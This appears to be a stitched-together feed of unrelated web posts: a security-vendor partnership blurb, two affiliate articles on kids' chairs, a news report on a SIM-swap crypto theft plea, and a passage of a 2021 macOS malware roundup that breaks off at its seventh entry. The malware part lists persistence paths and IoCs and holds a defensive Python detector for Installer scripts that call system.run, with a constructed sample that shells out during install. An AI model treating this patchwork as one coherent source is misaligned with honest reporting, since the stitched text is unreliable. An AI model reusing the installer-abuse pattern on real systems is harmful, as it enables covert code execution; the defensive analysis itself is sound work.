  • Supercharge Your Threat Hunting – create automated workflows to look for specific indicators across a fleet of SentinelOne-protected endpoints, allowing teams either to efficiently investigate the devices where they are found or to automate adding items to block lists.
  • Enrich Your Threat Intelligence – for every threat discovered on a SentinelOne-protected endpoint, automate additional analyses, update results within the SentinelOne platform and add automated notes.

More generally, security teams can add Torq workflows for

  • Responding to Suspicious User Activity – when detected, send a verification to the user via Slack. Either allow the action (if the user verifies) or quarantine the account or endpoint if not.
  • Remediating CSPM – automatically remediate simple issues, route alerts to multiple teams for fixes, and create ‘recommended action’ buttons in Jira, Slack, and other systems.
  • Easily onboarding/offboarding – orchestrate policy updates across all systems and automatically trigger flows. Require approvals for granting/removing sensitive permissions.

Why We’re Excited to See Torq Succeed

Decoupling automation and remediation from SOAR, and enabling integration with agnostic data sources to support more complex workflows that respond to threats or even assert a proactive posture against them, is one of the keys to an open XDR offering. Torq’s no-code approach delivers on this vision and provides an approachable visual and declarative means of authoring automation for security experts and novices alike, which is critical given the deficit of security professionals in our field.

We commend Torq for building a top-notch engineering team that delivers a simple, intuitive user experience that abstracts a very robust and well-thought-out platform. We are very excited to partner with the Torq team.

If you’d like to learn more about SentinelOne and Torq, contact us or request a free demo.

Is A Leather Chair Suitable For Kids?

Parents looking for stylish kids’ furniture that is both comfortable and affordable may want to consider the many benefits of leather chairs. Leather chair lounge designs have been around since ancient times, but they have become more modernized with time. In addition to being classy and quite comfortable, quality leather children’s furniture can be a great investment.

Regardless of the reasons for seeking new kids’ furniture, leather lounge chairs are an excellent choice. They are not only comfortable, but they come in many different colors and designs to satisfy your child’s personal taste. Leather lounge chairs for kids can look great in any bedroom or playroom and provide comfort and function. If you want to make a statement, leather chair designs will do it for you.

There are a few things to consider when purchasing leather chairs for kids:

  • The age of your child. Depending on their size, a leather chair may be too big or too small for them. It is important to find furniture that is both comfortable and manageable for your child to use.
  • Additionally, you will want to take into consideration their specific tastes. Some children want certain styles, while others prefer a more neutral style that would go with any décor.
  • Sustainability and eco-friendliness are other factors that should be considered when purchasing any type of furniture, but it is essential when purchasing items for kids. You want to make sure that neither you nor your little one has an issue with animal rights.

Faux leather chairs for kids – is it an alternative for kids’ leather chairs?

Leather as a material has a lot of benefits. It is not only comfortable, but it can last long and also adds a luxurious look to your house. Kids’ furniture made of leather is no exception. However, many feel that animal-based materials are cruel. Therefore, kids’ faux leather chairs have become very popular in today’s marketplace.

If you’re looking for a more affordable, animal-friendly option, faux leather chairs for kids may be the right choice for you. Faux leather is made from synthetic materials that look and feel like genuine leather. This makes it an excellent alternative for parents who want the look and feel of leather furniture but don’t want to harm any animals.

Faux leather chairs come in various colors and designs so that you can find the perfect one for your child’s bedroom or playroom. They are also very affordable, making them a great choice for parents on a budget.

Like leather furniture, it is important to consider your child’s age and taste when choosing faux leather chairs. Be sure to buy one that is the right size for your little one and one that they will be comfortable sitting in.

If you’re looking for a stylish, affordable addition to your child’s bedroom or playroom, faux leather kids’ chairs are an excellent choice!

Best Kids’ Faux Leather Chairs – Your Children Will Love Them

If you’re shopping for a lower-priced but high-quality kids’ chair, you will want to consider the kids’ faux leather chairs available from Amazon.com. We have gathered five of the best-selling and highest-rated faux leather chairs for kids on Amazon, so you can be sure your child will love their new chair.

Baby Care Leather Kids Sofa

The Baby Care Leather Kids Sofa is the perfect size for toddlers. It provides a comfortable and cozy place for your little one to relax. They will love crawling into this soft, faux leather chair to read their favorite book or watch cartoons.

The Baby Care Leather Kids Sofa is made of soffkin fabric, a type of synthetic leather. This makes it a durable and easy-to-clean chair. It is also waterproof and has antibacterial properties, making it a safe choice for kids.

The Baby Care Leather Kids Sofa receives 5 stars out of 5 on Amazon from over 100 reviews. Parents love the durable and waterproof material that this chair is made with. They also like how comfortable it is and rave about their children loving to sit in it.

Melissa & Doug Brown Coffee Faux Leather Child’s Armchair

The Melissa & Doug Child’s Armchair is a pleasant and well-made chair for toddlers and preschoolers. The faux leather kids’ chair comes in five colors: coffee, brown faux leather, denim, and pink. It is also an Amazon Exclusive, so you can only buy it there.

This kids’ armchair accommodates children aged three years and up, providing them the ideal cozy location to snuggle with their favorite toy, book, game, or activity. It can support a weight of up to 100 pounds.

The Melissa & Doug Brown Coffee Faux Leather Child’s Armchair receives 4.8 stars out of 5 on Amazon from over 500 reviews. Parents love how sturdy this chair is and how well the faux leather material holds up against their children’s wear and tear.

Amazon Basics Faux Leather Kids/Youth Recliner with Armrest Storage

The AmazonBasics Faux Leather Kids/Youth Recliner with Armrest Storage is perfect for children aged 3 and up. It has a weight capacity of 90 pounds and reclines all the way back. It is a perfect mini version of the recliner for adults! This makes it ideal for taking a quick nap or just relaxing after a long day of play.

The faux leather upholstery is easy to clean, and the chair comes in a variety of adorable colors, including brown, pink, and beige.

The armrests of this kids’ recliner hide a storage compartment for books, video game controllers, remotes, and more.

The AmazonBasics Faux Leather Kids/Youth Recliner with Armrest Storage receives 4.7 stars out of 5 on Amazon from over 1,500 reviews. Parents love the reclining function and color selection of this chair, as well as the storage compartments on the armrests. They also find that it is a very comfortable chair for their kids to relax in. It is also good value for money!

Flash Furniture Contemporary Brown LeatherSoft Kids Recliner with Cup Holder and Headrest

This easy recliner provides the comfort that grown-ups enjoy, making it ideal for small children. Your child will be entertained knowing they may sit in this push-back recliner while the family gathers in the living room to watch TV and movies.

The chair can support up to 90 pounds and has a safety mechanism that works as follows: as soon as the kid is in a seated position and the ottoman is pulled out one inch, the seat will recline. This child-sized recliner will look fantastic in your living room, bedroom, or playroom.

The LeatherSoft upholstery is resilient enough to withstand active children, making cleanup a breeze. With an enormous headrest, solid hardwood structure, and a cup holder in the arm to keep their favorite drink, you’ll have no trouble selecting this item.

The Flash Furniture Contemporary Brown LeatherSoft Kids Recliner comes in a variety of different colors and has a 4.7-star rating on Amazon with over 8,000 reviews! Parents love this chair for its sturdy build, comfortable design, and easy-to-clean fabric.

As you can see, there are many different types of chairs that are perfect for kids. No matter what your child’s personality or interests may be, you will be able to find a chair that suits them. You can even get matching furniture for the whole family!

Happy shopping and enjoy your new chair!

The post Is A Leather Chair Suitable For Kids? appeared first on Comfy Bummy.

NY Man Pleads Guilty in $20 Million SIM Swap Theft

A 24-year-old New York man who bragged about helping to steal more than $20 million worth of cryptocurrency from a technology executive has pleaded guilty to conspiracy to commit wire fraud. Nicholas Truglia was part of a group alleged to have stolen more than $100 million from cryptocurrency investors using fraudulent “SIM swaps,” scams in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s online identities.

Truglia admitted to a New York federal court that he let a friend use his account at crypto-trading platform Binance in 2018 to launder more than $20 million worth of virtual currency stolen from Michael Terpin, a cryptocurrency investor who co-founded the first angel investor group for bitcoin enthusiasts.

Following the theft, Terpin filed a civil lawsuit against Truglia with the Los Angeles Superior court. In May 2019, the jury awarded Terpin a $75.8 million judgment against Truglia. In January 2020, a New York grand jury criminally indicted Truglia (PDF) for his part in the crypto theft from Terpin.

A SIM card is the tiny, removable chip in a mobile device that allows it to connect to the provider’s network. Customers can legitimately request a SIM swap when their mobile device has been damaged or lost, or when they are switching to a different phone that requires a SIM card of another size.

Nicholas Truglia, holding bottle. Image: twitter.com/erupts

But fraudulent SIM swaps are frequently abused by scam artists who trick mobile providers into tying a target’s service to a new SIM card and mobile phone controlled by the scammers. Unauthorized SIM swaps often are perpetrated by fraudsters who have already stolen or phished a target’s password, as many financial institutions and online services rely on text messages to send users a one-time code for multi-factor authentication.

Compounding the threat, many websites let customers reset their passwords merely by clicking a link sent via SMS to the mobile phone number tied to the account, meaning anyone who controls that phone number can reset the passwords for those accounts.

Reached for comment, Terpin said his assailant got off easy.

“I am outraged that after nearly four years and hundreds of pages of evidence that the best the prosecutors could recommend was a plea bargain for a single, relatively minor count of the unauthorized use of a Binance exchange account, when all the evidence points toward Truglia being one of two masterminds of a wide-ranging criminal conspiracy to steal crypto from me and others,” Terpin told KrebsOnSecurity.

Terpin said public court records already show Truglia bragging about stealing his funds and using it to finance a lavish lifestyle.

“He at the very least withdrew 100 bitcoin (worth $1.6 million at the time and nearly $5 million today) from my theft into his wallet at a separate, US-based exchange, and then moved or spent it,” Terpin said. “The fact is that the intentional theft of $24 million, whether taken at the point of a gun in a bank or through a SIM card swap, is a major felony. Truglia should be prosecuted to the fullest extent of the law.”

Nicholas Truglia, showing off a diamond-studded Piaget watch while aboard a private jet. Image: twitter.com/erupts.

Terpin also is waging an ongoing civil lawsuit against 18-year-old Ellis Pinsky, who’s accused of working with Truglia as part of a SIM swapping crew that has stolen more than $100 million in cryptocurrency. According to Terpin, Pinsky was 15 when he took part in the $24 million 2018 SIM swap, but he returned $2 million worth of cryptocurrency after being confronted by Terpin’s investigators.

“On the surface, Pinsky is an ‘All American Boy,’” Terpin’s civil suit charges. “The son of privilege, he is active in extracurricular activities and lives a suburban life with a doting mother who is a prominent doctor.”

“Despite their wholesome appearances, Pinsky and his other cohorts are in fact evil computer geniuses with sociopathic traits who heartlessly ruin their innocent victims’ lives and gleefully boast of their multi-million-dollar heists,” the lawsuit continues. “Pinsky is reputed to have used his ill-gotten gains to purchase multi-million-dollar watches and is known to go on nightclub sprees at high end clubs in New York City, and Truglia rented private jets and played the part of a dashing playboy with young women pampering him.”

Pinsky could not be immediately reached for comment. But a review of the latest filings in the lawsuit shows that Pinsky’s attorneys stopped representing him because he no longer had the funds to pay for their services. The most recent entry in the New York Southern District’s docket asks the court to give Pinsky additional time to seek counsel, and hints that barring that he may end up representing himself.

Ellis Pinsky, in a photo uploaded to his social media profile.

Truglia is still being criminally prosecuted in Santa Clara, Calif., the home of the REACT task force, which pursues SIM-swapping cases nationwide. In November 2018, REACT investigators and New York authorities arrested Truglia on suspicion of using SIM swaps to steal approximately $1 million worth of cryptocurrencies from Robert Ross, a San Francisco father of two who later went on to found the victim advocacy website stopsimcrime.org.

According to published reports, Truglia and his accomplices also perpetrated SIM swaps against the CEO of the blockchain storage service 0Chain; hedge-funder Myles Danielson, vice president of Hall Capital Partners; and Gabrielle Katsnelson, the co-founder of the startup SMBX.

Truglia is currently slated to be sentenced in April 2022 for his guilty plea in New York. He faces a maximum sentence of up to 20 years in prison.

Erin West, deputy district attorney for Santa Clara County, told KrebsOnSecurity that SIM swapping remains a major problem. But she said many of the victims they’re now assisting are relatively new cryptocurrency investors for whom a SIM swapping attack can be financially devastating.

“Originally, the SIM swap targets were the early adopters of crypto,” West said. “Now we’re seeing a lot more of what I would call normal people trying their hand at crypto, and that makes a lot more people a target. It makes people who are unfamiliar with their personal security online vulnerable to hackers whose entire job is to figure out how to part people from their money.”

West said REACT continues to train state and local law enforcement officials across the country on how to successfully investigate and prosecute SIM swapping cases.

“The good news is our partners across the nation are learning how to conduct these cases,” she said. “Where this was a relatively new phenomenon three years ago, other smaller jurisdictions around the country are now learning how to prosecute this crime.”

All of the major wireless carriers let customers add security against SIM swaps and related schemes by setting a PIN that needs to be provided over the phone or in person at a store before account changes should be made. But these security features can be bypassed by incompetent or corrupt mobile store employees.

For some tips on how to minimize your chances of becoming the next SIM swapping victim, check out the “What Can You Do?” section at the conclusion of this story.

The best Frozen kids chairs for Disney fans

Disney Frozen is probably the most popular animated movie of the last couple of years. It has conquered millions of hearts and turned little girls everywhere into true fans eager to see anything and everything that has something to do with their beloved characters, Anna and Elsa. Well, we have great news for all of you Frozen fans out there!

We’ve done some research and found the best Frozen kids chairs for you to buy. Not only are they super exciting and fun, but they are also durable enough to hold the weight of your little princess (or prince) for years.

Take a look at some of the best Frozen kids chairs currently available:

Delta Children Upholstered Chair, Disney Frozen

It is no surprise that Delta Children’s kids’ chairs lead our list. The company is widely known for its attention to detail and quality of products. This specific one is no exception. It has a pretty straightforward design, but it looks super cute.

The polyester fabric of the chair backs promises durability while still being soft enough to be comfortable for your kids. The characters on the chair will keep your child entertained for hours on end, and the high-back design provides excellent support – perfect for those long movie nights. The chair is recommended for kids aged 3 and older, but it can hold weights of up to 100 pounds.

This chair is available in two different designs:

The price varies depending on the chosen design: the Frozen kids’ chair from Delta Children can cost between $65 and $95 on Amazon, which might seem like a lot to some of you; however, we believe this is one of the best Frozen kids chairs out there!

Delta Children Figural Upholstered Kids Chair, Disney Frozen II

We just can’t get enough of Delta Children’s products, and this Figural Upholstered Kids Chair is definitely one of our favorites. It features a slightly different design from the one previously mentioned, as it sports a high-quality image of Elsa or Anna on the chair back. This gives the chair a unique look, and your child will definitely feel like a true Disney Frozen fan when sitting in it.

Like the other Delta Children’s chair, this one is also made out of polyester fabric that is not only soft but also durable. It is designed for children 3 years and up and can hold up to 100 pounds.

Check the retail price of the chair on Amazon by clicking on the name of the preferred Frozen character:

  • Elsa – Frozen II Delta Children Figural Upholstered Kids Chair
  • Anna – Frozen II Delta Children Figural Upholstered Kids Chair

Idea Nuova Frozen 2 Swivel Mesh Rolling Desk Chair

Having a good desk chair is crucial for all kids, especially those who love spending time doing homework or playing games in their room. This Idea Nuova Frozen 2 Swivel Mesh Rolling Desk Chair is perfect for all of you Frozen fans out there! It has a cool and modern design, featuring an image of Anna and Elsa on the back.

The chair is made out of high-quality mesh and plastic materials, making it both durable and lightweight. It also features a 360-degree swivel base, so your child can easily rotate to face the TV or desk. The chair can hold up to 225 pounds, making it perfect for both younger and older kids. The easy-to-use lever and pneumatic mechanism on this swivel workplace chair allow you to change its height to your desired level. The mesh cushioned seat is pleasant and straightforward to maintain. The curved mesh back provides support and comfort for the back.

Idea Nuova Frozen 2 Saucer Chair

A saucer chair is an original addition to any Frozen fan’s bedroom or playroom. This Idea Nuova Frozen 2 Saucer Chair is made out of high-quality and durable materials, featuring a beautiful image of the Frozen trio, Anna, Elsa and Olaf, on the back. It is perfect for kids who love to lounge around and watch TV, read books, or play games.

The saucer chair is made of a sturdy metal frame and soft and comfortable fabric. It can hold up to 80 pounds, making it perfect for both younger and older kids. The metal frame has a safety locking mechanism to keep the chair sturdy and in place. The Saucer Chair also features LED lights.

The saucer chair features a foldable design that makes it easy to store when not in use. It folds flat for simple, space-saving transportation and storage. This saucer chair won’t take up much room, making it a great purchase.

Kids’ Frozen chairs – bean bags

Bean bags are truly a timeless classic, and they can be just as stylish as the most fashionable chairs. If your kid loves to sit back and relax with a good book or watch TV, then a bean bag is the perfect addition to their room! Several bean bags featuring Frozen characters are available on the market, and we’ve chosen our favorites for you:

Disney Frozen Cozee Fluffy Chair by Delta Children

This soft and fluffy chair is perfect for all Frozen fans out there. It is made out of high-quality materials, featuring an image of Anna and Elsa on the front. The chair is designed for children aged 2-6 years old and can hold up to 60 pounds.

It provides greater comfort and support than traditional bean bag chairs since it is stuffed with shredded foam that shapes to your child’s body. The soft faux fur cover and supportive back ensure that youngsters have an oh-so-comfortable place of their own, and its lightweight construction means it can be taken anywhere your child goes. Side pockets on this chair are perfect for storing toys, books, or movie snacks.

As a bonus, the chair’s non-slip bottom keeps it in place. It’s the ideal piece of furniture for your playroom, bedroom, or living room.

Idea Nuova Disney Frozen 2 Elsa Figural Bean Bag Chair with Sherpa Trim

This Elsa Frozen Figural Bean Bag Chair is perfect for all of your favorite little Frozen fans. The bean bag is made out of soft and durable fabric, featuring a beautiful image of Elsa on the front. It is perfect for kids who love to lounge around and watch TV, read books, or play games.

This iconic chair is a must-have for all Frozen fans, thanks to its printed image of Elsa, which is studded with winter wonderland snowflakes. The chair has Sherpa piping on the seat and arms for added warmth and comfort. It is designed for children aged 2-5 years old.

It’s a great gift idea, especially during the colder months of the year. The soft plush fabrics ensure that your child will have a cozy place to relax after a long day of playing outside.

Idea Nuova Disney Frozen Figural Bean Bag Chair

The most classic bean bag chair on this list. Frozen fans will enjoy this fantastic round figural kids’ bean bag chair! You can’t go wrong with this adorable Frozen decorative bean bag, which features an embroidery of the famous character Elsa. It is an excellent addition to any space and a must-have in every child’s room.

This bean bag chair is made of polyester fabric and is sturdy and long-lasting. It can support up to 81 pounds and is relatively small, making it perfect for younger children. Plus, it is convenient to take with you for movie nights at a friend’s or family member’s house.

Idea Nuova Frozen 2 Kids Nylon Bean Bag Chair with Piping & Top Carry Handle with Olaf Graphics

Frozen is not only about Elsa and Anna! This movie would not be the same without Olaf either. Kids can now enjoy their favorite Frozen scenes and characters with this Olaf bean bag chair! It is a perfect addition to any bedroom, living room, playroom, or even classroom. It has a design featuring Olaf’s smiling face on the front, and it is made out of high-quality nylon fabric, which will not fray over time.

The bean bag features a top carry handle for easy transportation from room to room as needed. This bean bag chair can hold up to 60 pounds and has a size of 18” x 18” x 11”. Great for kids aged 2-5 years old.

Bean bag chairs are the perfect gift idea, especially if they are character-themed. They are fun and comfy, so kids will love sitting on them watching TV, reading books, or playing games. All of these bean bags can be purchased on Amazon.

Frozen kids’ camping chairs for those Northern Adventures!

What’s a better way to enjoy the great outdoors than with an adventure inspired by Frozen? These chairs are perfect for your little ones who want to join in on all the fun! The chairs are made of durable and lightweight materials so that they can be easily transported from one spot to another. They are also comfortable, thanks to the padded seats and armrests, which provide better back support. The chairs can fold flat and include straps for easier transport. With these chairs, you can turn any outdoor event into something Frozen-tastic!

The Frozen-themed kids’ camping chairs from Jakks Pacific caught our attention. Jakks Pacific is a well-known toy and collectibles manufacturer that collaborates with some of the biggest licensors in the entertainment industry. Their Frozen camping chairs are officially licensed Disney products.

The chairs are designed for children aged 3 and up. They are made of polyester and have a weight limit of 100 pounds. The dimensions of the chairs are 21.5″D x 12.9″W x 20.38″H, and each weighs under 3 pounds.

Frozen-themed activity furniture for the kids’ playroom

There are tons of Frozen toys available, but how about some furniture? These activity tables are perfect for the Frozen-themed playroom!

Delta Children Kids Table and Chair Set

Frozen-themed kids’ table from the Delta Children collection

This activity table has a cute Frozen-themed design. The table and chairs are made of solid and durable wood, and they can be easily cleaned. The chairs can hold up to 50 pounds each.

The Frozen activity table is perfect for arts and crafts, snacks, or homework time. It would also be great for playing games or just reading a book. The table includes a storage bin where kids can keep all their art supplies.

The table and chairs set are ideal for children aged 2-6 years old. Kids won’t want to stop playing with them! They will be having so much fun!

Delta Children Kids Convertible Activity Bench, Disney Frozen II

It’s a must-have for any growing youngster. It has a 3-in-1 design that instantly transforms from a storage bench to a desk, allowing your child to transition between playtime and ideal homework conditions in seconds!

This extremely flexible workstation also includes two fabric bins beneath, making it the ideal location for kids to store their toys, books, or art materials. This durable activity bench can be used by children aged 3-7.

Idea Nuova Disney Frozen II 3 Piece Collapsible Set with Storage Table and 2 Ottomans

Give your children a place to sit and a place to store their belongings! The 3 Piece Storage Table and Ottoman Set is the ideal method to keep clutter at bay while still providing a location for your child to do everything from painting to eating supper. Table and ottomans are collapsible in design for easy storage when not in use.

Table and bench duet provides hours of playtime fun while doubling as a clean surface for snack time, crafts, and more.

How is Frozen so popular?

Quite simply, Frozen is popular because it is an excellent movie. It has a great story, lovable characters, beautiful animation, and catchy songs. But beyond that, Frozen has resonated with people on a deeper level.

Some say that Frozen speaks to the universal experience of being ostracized or feeling different. Elsa, the Snow Queen, has to hide her magical powers for fear of being rejected by society. This storyline is something that a lot of people can relate to.

Additionally, Frozen addresses important topics like love, sisterhood, and self-acceptance in a meaningful and entertaining way. This is why Frozen has become such a phenomenon and is sure to be a favorite for many years to come.

The post The best Frozen kids chairs for Disney fans appeared first on Comfy Bummy.

Top 10 macOS Malware Discoveries in 2021 | A Guide To Prevention & Detection

As we approach the end of 2021, we take a look at the year’s main malware discoveries targeting the macOS platform with an emphasis on highlighting the changing tactics, techniques and procedures being employed by threat actors. In particular, we home in on what is unique about each malware discovery, who it targets and what its objectives are.

On top of that, you’ll find a breakdown of the essential behavior of each threat and links to deeper technical analyses. At the end of the post, we draw out the main lessons Mac admins and security teams can learn from this year’s crop of macOS malware to help them better protect their Mac fleets going into 2022.

Summary of Key Trends Emerging During 2021

As we will describe below, several things stand out about macOS malware in 2021. These include:

  • macOS targeted in more cross-platform malware campaigns, with malware written in Go, Kotlin and Python observed
  • A drive towards attacks on developers and other ‘high-value’ targets
  • An increasing interest in targeting macOS users in the East (China and Asia)
  • A continued reliance on using LaunchAgents as the primary persistence mechanism
  • While commodity adware is by far the most prevalent threat on macOS, most new malware families that emerged in 2021 focused on espionage and data theft.

In 2021 to-date, there have been ten new reported malware discoveries. Let’s take a look at what was unique for each one and the main points that defenders need to be aware of.

Top 10 In-the-Wild macOS Malware Discoveries 2021

1. ElectroRAT

In January 2021, Intezer reported on Operation ElectroRAT, a campaign that had been running throughout 2020 targeting cryptocurrency users. This was the first of an increasingly common trend throughout 2021: cross-platform malware written in Go targeting macOS, Linux and Windows operating systems. The aim was to get cryptocurrency users to install a trojanized application for trading and managing cryptocurrency.

All versions were built using Electron, and once the trojan app is installed and launched, a malicious background process called “mdworker” functions as the RAT, capable of keylogging, taking screenshots, executing shell commands, and uploading and downloading files. The name was carefully chosen: “mdworker” is also the name of a legitimate system binary that powers the Mac’s Spotlight search functionality.

The malicious mdworker binary is copied from the trojan bundle and written as a hidden file in the user’s home folder. Persistence is via a property list in the user’s LaunchAgents folder.

Primary IoCs:

~/Library/LaunchAgents/mdworker.plist
~/.mdworker
/Applications/eTrader.app/Contents/Utils/mdworker

Notable Characteristics:

  • Cross-platform RAT malware written in Go
  • Uses trojanized Crypto Trading applications
  • Attempts to hide as a system process (T1564.001)
  • Uses a Launch Agent for persistence (T1543.001)

2. OSAMiner

Also in January, SentinelLabs reported on OSAMiner, part of a campaign that had been in existence in various forms for at least five years and which appears to target primarily Chinese and Asian Mac users by installing a hidden Monero crypto miner.

OSAMiner was novel primarily for its extensive use of multiple, run-only AppleScripts. Due to the difficulty in reversing run-only AppleScripts, this technique helped it to hide its activity. As we shall see below, this technique (and indeed some of the code) was later copied by XCSSET.

Among other behaviors, the OSAMiner malware sets up a persistence agent and downloads the first stage of the miner by retrieving a URL embedded in a public web page.

OSAMiner persists via LaunchAgents that attempt to evade detection by using labels and file paths containing “com.apple”.

Primary IoCs:

~/Library/11.png
~/Library/k.plist
~/Library/LaunchAgents/com.apple.FY9.plist
~/Library/LaunchAgents/com.apple.HYQ.plist
~/Library/LaunchAgents/com.apple.2KR.plist
~/Library/Caches/com.apple.XX/ssl4.plist (where “XX” is any two uppercase letters)

Notable Characteristics:

  • Cryptominer
  • Uses a complex combination of run-only AppleScripts (T1059.002)
  • Retrieves next-stage URL embedded in a publicly-hosted image
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)

3. Silver Sparrow

First disclosed by researchers at Red Canary, Silver Sparrow was likely intended to function as an adware/PUP delivery mechanism for unscrupulous developers willing to pay the authors for a ‘pay per install’ (PPI) mechanism. As it was, Silver Sparrow’s infrastructure was taken down before any payloads were delivered, but the infection mechanism is an interesting – and hitherto unknown – way to abuse the Installer package that defenders and analysts should be aware of.

Installer packages typically use dedicated preinstall and postinstall shell scripts for preparing and cleaning up software installations. Silver Sparrow takes a different approach and (ab)uses the Distribution file to execute bash commands via the JavaScript API during the installation process.

In the observed instances, this code sets up a persistence agent with the filename pattern init-.plist in ~/Library/LaunchAgents, writes a program executable with the file path pattern: ~/Library/Application Support/_updater/.sh, and attempts to download and execute a payload at /tmp/.
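A defender can spot this Distribution-file trick before a package is deployed by checking the JavaScript it carries for the Installer API call that executes a process. The check below is an added example, not code from this post or from Red Canary; the two Distribution files it parses are constructed, and `system.run` is the Installer JavaScript API call it looks for.

```python
"""Check an Installer Distribution file for JavaScript that runs commands.

Added example, not from the post or from Red Canary. A flat .pkg carries a
Distribution XML (pkgutil --expand writes it out); its <script> bodies run in
Installer's JavaScript engine during the GUI install, and system.run() is the
API that lets that JavaScript execute a process. Both samples are constructed.
"""
import re
import xml.etree.ElementTree as ET

# system.run(...) and any variant of it; captures the argument list for reporting.
SYSTEM_RUN = re.compile(r"system\.run\w*\s*\(([^)]*)\)")
# Elements whose script= attribute hooks JavaScript into the install flow.
HOOK_TAGS = ("installation-check", "volume-check")


def distribution_findings(xml_text: str) -> dict:
    """Parse a Distribution file and report every system.run call it contains.

    Returns {"calls": [...], "hooks": [...], "verdict": "review" | "ok"}.
    A Distribution file with no <script> at all yields an empty, "ok" result.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "installer-gui-script":
        raise ValueError(f"not a Distribution file (root is <{root.tag}>)")

    calls = []
    for index, script in enumerate(root.iter("script")):
        for match in SYSTEM_RUN.finditer(script.text or ""):
            calls.append({"script": index, "args": match.group(1).strip()})

    # Which hooks invoke JavaScript and which function each one calls; this
    # tells the reviewer at what stage of the install the script runs.
    hooks = [{"hook": el.tag, "calls": el.get("script")}
             for el in root.iter() if el.tag in HOOK_TAGS and el.get("script")]

    return {"calls": calls, "hooks": hooks,
            "verdict": "review" if calls else "ok"}


# Constructed: a Distribution whose only JavaScript is a version check, the
# ordinary use of the Installer JavaScript API.
BENIGN_DISTRIBUTION = """<installer-gui-script minSpecVersion="1">
  <title>Example Tool</title>
  <installation-check script="checkOS()"/>
  <script><![CDATA[
    function checkOS() {
      if (system.compareVersions(system.version.ProductVersion, '10.13') < 0) {
        my.result.title = 'Unsupported macOS';
        my.result.type = 'Fatal';
        return false;
      }
      return true;
    }
  ]]></script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default"><pkg-ref id="com.example.tool"/></choice>
  <pkg-ref id="com.example.tool">tool.pkg</pkg-ref>
</installer-gui-script>
"""

# Constructed: the same layout, but the installation-check shells out. The
# command only touches a marker file; the point is the pattern, which the
# installer runs before any payload package is even unpacked.
SUSPICIOUS_DISTRIBUTION = """<installer-gui-script minSpecVersion="1">
  <title>Example Tool</title>
  <installation-check script="setup()"/>
  <script><![CDATA[
    function setup() {
      system.run('/bin/sh', '-c', 'touch /tmp/example_marker');
      return true;
    }
  ]]></script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default"><pkg-ref id="com.example.tool"/></choice>
  <pkg-ref id="com.example.tool">tool.pkg</pkg-ref>
</installer-gui-script>
"""


if __name__ == "__main__":
    for name, xml_text in (("benign", BENIGN_DISTRIBUTION),
                           ("suspicious", SUSPICIOUS_DISTRIBUTION)):
        print(name, distribution_findings(xml_text))
```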

Primary IoCs:

~/Library/Application Support/verx_updater/verx.sh
~/Library/LaunchAgents/init_verx.plist
~/Library/LaunchAgents/verx.plist
~/Library/LaunchAgents/init_agent.plist
~/Library/Application Support/agent_updater

Notable Characteristics:

  • Adware Loader
  • Uses the Distribution file in Apple Package Installer
  • Downloads malware with Bash commands (T1059.004)
  • Uses the JavaScript API (T1059.007)
  • Uses a Launch Agent for persistence (T1543.001)

4. Silver Toucan/WizardUpdate/UpdateAgent

A malware with many names, this Adload dropper was variously co-discovered by Red Canary, Confiant and Microsoft across late February/early March 2021, with Microsoft also tracking changes as recently as October. Early versions of the dropper were distinctive in the way they used curl and Amazon AWS instances to download various second and third stage payloads. Microsoft also noted that UpdateAgent deploys a Gatekeeper bypass, but what particularly caught attention was the way this actor bypassed Apple’s Notarization check and succeeded in getting all their malicious packages notarized.

According to a tweet from Confiant, the trick is deceptively simple: create a benign application in a standard Apple package installer, and use the package’s postinstall script to pull down the malware.

The lesson here is clear: neither Gatekeeper nor Notarization guarantee your downloads are malware free. Seek help from other sources!

Primary IoCs:

/Library/Application Support/Helper/HelperModule
/Library/Application Support/WebVideoPlayer/WebVideoPlayerAgent
/Library/Application Support/McSnip/McSnipAgent
~/Library/Application Support/Quest/QuestBarStatusAgent
~/Library/Application Support/SubVideoTube/SubVideoTubeStatusAgent

Notable Characteristics:

  • Loader platform
  • Uses postinstall script to download payloads (T1059.004)
  • Ingress Tool/File Transfer with CURL (T1105)
  • Makes use of public cloud infrastructure for C2s
  • Malware is Notarized by Apple
  • Malware uses a Gatekeeper bypass

5. XcodeSpy

In March, SentinelLabs reported on what looked very much like a targeted attack on iOS developers using Apple’s Xcode. XcodeSpy, a trojanized Xcode project, was found in the wild targeting iOS developers with an EggShell backdoor. The malicious project was a doctored version of a legitimate, open-source project available on GitHub, which would execute an obfuscated Run Script when the developer’s build target was launched.

The dropped EggShell backdoor is a Mach-O executable able to record information from the victim’s microphone, camera, and keyboard.

While the use of a trojanized Xcode project and obfuscated Run Script is a novel vector that we have not seen before, the malware uses a tried-and-tested persistence technique, installing a user LaunchAgent for persistence and trying to disguise it as a legitimate Apple file.

Primary IoCs:

~/Library/LaunchAgents/com.apple.usagestatistics.plist 
~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist
~/Library/Application Scripts/com.apple.Preview/.stors
~/Library/Application Scripts/com.apple.TextEdit/.scriptdb
~/Library/Application Support/com.apple.AppStore/.update
/private/tmp/.tag

Notable Characteristics:

  • Backdoor
  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Uses a Mach-O, customized EggShell instance
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)

6. WildPressure

In July, Kaspersky revealed details of another cross-platform Trojan with a macOS component. According to the researchers, WildPressure is a newly-identified APT operation targeting entities in the Middle East. The macOS component of WildPressure is embedded in a Python file, which itself is executed persistently by a LaunchAgent using com.apple as part of the label name in an effort to blend in with system processes.

The same Python file has some rudimentary AV detection logic.

While Python-based post-exploit kits are common enough on all platforms, this is the first time we have seen APT-level malware on macOS making use of a Python script in the program arguments of a LaunchAgent.

Primary IoCs:

~/Library/LaunchAgents/com.apple.pyapple.plist
~/Library/LaunchAgents/apple.scriptzxy.plist
~/.appdata/grconf.dat

Notable Characteristics:

  • Backdoor
  • Cross-Platform
  • Attempts to hide as a system process (T1564.001)
  • Uses a Launch Agent for persistence (T1543.001)
  • Uses Python for its executable (T1059.006)

7. XLoader

